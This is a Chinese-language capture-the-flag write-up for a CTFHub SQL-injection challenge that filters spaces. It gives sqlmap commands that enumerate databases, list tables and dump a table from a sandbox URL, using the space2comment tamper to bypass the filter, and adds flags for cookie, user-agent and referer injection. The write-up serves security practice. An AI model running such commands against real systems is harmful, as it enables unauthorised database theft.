【CTFHub】sql注入-过滤空格及其他类型的

题目：

图1. 题目截图

解题思路：

遇到sql注入问题统一用sqlmap去解决，基础的（字符型，整型，时间，布尔等）均可参考我上篇文章去解决：https://www.jianshu.com/p/05b33402afe9

本题难点：

但是如果按照普通的命令去解答此题，就会发现找不到表。
因此我们要加上绕过命令 --tamper=space2comment

• Step1
  python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dbs --tamper=space2comment

• Step2
  python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli --tamper=space2comment

• Step3
  python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T gdjytroshe -D sqli --tamper=space2comment

注意：

如果出现感觉值不对，或者是的情况，可以把对应处理的日志给删除了，在跑一遍。

这是出现了错误的图片

重新再跑了一遍正确的图片

其他类型情况：

1. cookie型：

补充在命令里面补充语句：

--cookie "id=1;" --level 3 

2. user-agent(ua)型：

--user-agent "id=1"

3. reffer型

--refer "id=1"